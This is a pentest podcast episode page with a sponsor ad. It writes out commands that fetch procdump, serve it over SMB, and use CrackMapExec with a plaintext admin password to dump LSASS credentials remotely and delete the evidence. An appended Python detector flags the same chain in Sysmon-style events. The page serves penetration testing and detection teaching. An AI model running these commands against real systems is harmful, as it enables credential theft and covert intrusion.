7MS #383: Tales of Internal Network Pentest Pwnage - Part 10

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

This episode is a "sequel" of sorts to part 9 where I was helping another company tag-team an internal network pentest. (In announcer voice) "When we last left our heroes we had..."

  • Relayed one high-priv cred from one box to another
  • Dumped and cracked a local machine's hash
  • Passed that hash around the network
  • Found (via Bloodhound) some high value targets we wanted to grab domain admin creds from
  • Set the wdigest flag via CrackMapExec

Today, we talk about how we came back to the pentest a few days later and scripted the procdump/lsass operation to (hopefully) grab cleartext credentials from these high value targets. Here's how we did it:

First, set up a listening SMB server on your Kali box (in this case, 192.168.55.60):

mkdir /share
cd /share
wget https://live.sysinternals.com/procdump64.exe
screen -R smb
/opt/impacket/examples/smbserver.py -smb2support share /share

Then, we escaped the screen session and ran the following CME commands to copy procdump over to the victim machine, dump lsass, pull the dump back to our share, then delete procdump64.exe and the residual dump file:

crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'copy "\\192.168.55.60\share\procdump64.exe" "c:\users\public\procdump64.exe"'

crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'c:\users\public\procdump64.exe -accepteula -ma lsass.exe c:\users\public\lsass.dmp'

crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'copy "c:\users\public\lsass.dmp" "\\192.168.55.60\share\"'

crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'del "c:\users\public\lsass.dmp"

crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'del "c:\users\public\procdump64.exe"
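From the blue-team side, the sequence above leaves a distinctive trail: a binary executed from c:\users\public, a command line naming lsass and a .dmp file, a process opening lsass.exe with memory-read access, and a .dmp file written to disk. The following is an added example (not from the episode or the tools it mentions) that scores constructed Sysmon-style events (IDs 1, 10 and 11) against those indicators; the event dicts, field names and the 0x1FFFFF access mask are assumptions modelled on Sysmon's schema.

```python
"""Detect the procdump-over-SMB LSASS dump chain in Sysmon-style events."""
import re

# Constructed sample events (Sysmon 1 = ProcessCreate, 10 = ProcessAccess,
# 11 = FileCreate); not telemetry from the engagement described above.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c copy "\\192.168.55.60\share\procdump64.exe" "c:\users\public\procdump64.exe"'},
    {"EventID": 1, "Image": r"C:\Users\Public\procdump64.exe",
     "CommandLine": r"c:\users\public\procdump64.exe -accepteula -ma lsass.exe c:\users\public\lsass.dmp"},
    {"EventID": 10, "SourceImage": r"C:\Users\Public\procdump64.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 11, "Image": r"C:\Users\Public\procdump64.exe",
     "TargetFilename": r"C:\Users\Public\lsass.dmp"},
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},  # benign noise
]

PROCESS_VM_READ = 0x0010  # any mask with this bit can read lsass memory; -ma asks for 0x1FFFFF
USER_WRITABLE = re.compile(r"^c:\\users\\public\\", re.IGNORECASE)
LSASS_CMD = re.compile(r"\blsass(\.exe)?\b", re.IGNORECASE)
DUMP_EXT = re.compile(r"\.dmp\b", re.IGNORECASE)

def score_event(ev):
    """Return (rule, detail) findings for one event; empty list means nothing matched."""
    findings = []
    eid = ev.get("EventID")
    if eid == 1:
        cmd = ev.get("CommandLine", "")
        if LSASS_CMD.search(cmd) and DUMP_EXT.search(cmd):
            findings.append(("lsass_dump_cmdline", cmd))
        if USER_WRITABLE.match(ev.get("Image", "")):
            findings.append(("exec_from_public_dir", ev["Image"]))
    elif eid == 10 and ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        if int(ev.get("GrantedAccess", "0"), 16) & PROCESS_VM_READ:
            findings.append(("lsass_memory_read", ev.get("SourceImage", "")))
    elif eid == 11 and DUMP_EXT.search(ev.get("TargetFilename", "")):
        findings.append(("dump_file_written", ev["TargetFilename"]))
    return findings

def detect_chain(events):
    """Aggregate findings; cmdline + memory read + dump file together is high confidence."""
    findings = [f for ev in events for f in score_event(ev)]
    rules = {rule for rule, _ in findings}
    high = {"lsass_dump_cmdline", "lsass_memory_read", "dump_file_written"} <= rules
    return {"findings": findings, "high_confidence": high}

if __name__ == "__main__":
    for rule, detail in detect_chain(SAMPLE_EVENTS)["findings"]:
        print(f"{rule}: {detail}")
```

The memory-read rule alone fires on legitimate tools (AV, debuggers), so the chain correlation is what turns it into an alert; the copy to \\192.168.55.60\share is also visible as an outbound SMB write on the host firewall or network sensor.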

Did we get creds? Did we get DA? Listen to today's episode to find out!